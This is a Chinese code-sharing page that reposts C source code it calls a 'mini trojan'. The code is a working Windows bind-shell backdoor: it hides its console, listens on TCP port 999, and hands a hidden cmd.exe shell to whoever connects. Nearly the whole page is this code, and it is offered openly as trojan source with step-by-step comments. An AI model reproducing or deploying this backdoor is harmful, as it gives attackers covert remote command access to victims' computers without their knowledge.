码迷,mamicode.com
首页 > 其他好文 > 详细

mini木马c源码

时间:2018-01-20 11:03:39      阅读:153      评论:0      收藏:0      [点我收藏+]

标签:cleanup   ide   put   master   min   mini   pos   error   add   

#pragma comment(lib, "ws2_32.lib")

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

#include <winsock2.h>

#include <windows.h>

#define MasterPort 999  //定义监听端口999

int main(void)

{
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo;
    char szCMDPath[255];

//分配内存资源,初始化数据:

ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));

ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));

ZeroMemory(&WSADa, sizeof(WSADATA));

 

//获取cmd路径

GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));

 

//加载ws2_32.dll:

WSAStartup(0x0202,&WSADa);

 

//设置本地信息和绑定协议,建立socket,代码如下:

SockAddrIn.sin_family = AF_INET;

SockAddrIn.sin_addr.s_addr = INADDR_ANY;

SockAddrIn.sin_port = htons(MasterPort);

CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

 

//设置绑定端口999:

bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));

 

 //设置服务器端监听端口:

listen(CSocket,1);

iAddrSize = sizeof(SockAddrIn);

 

//开始连接远程服务器,并配置隐藏窗口结构体:

SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);

StartupInfo.cb = sizeof(STARTUPINFO);

StartupInfo.wShowWindow = SW_HIDE;

StartupInfo.dwFlags = STARTF_USESTDHANDLES |

STARTF_USESHOWWINDOW;

StartupInfo.hStdInput = (HANDLE)SSocket;

StartupInfo.hStdOutput = (HANDLE)SSocket;

StartupInfo.hStdError = (HANDLE)SSocket;

 

//创建匿名管道:

CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);

WaitForSingleObject(ProcessInfo.hProcess, INFINITE);

CloseHandle(ProcessInfo.hProcess);

CloseHandle(ProcessInfo.hThread);

 

//关闭进程句柄:

closesocket(CSocket);

closesocket(SSocket);

WSACleanup();

  //关闭连接卸载ws2_32.dll

return 0;

}

mini木马c源码

标签:cleanup   ide   put   master   min   mini   pos   error   add   

原文地址:https://www.cnblogs.com/ghost00011011/p/8319800.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!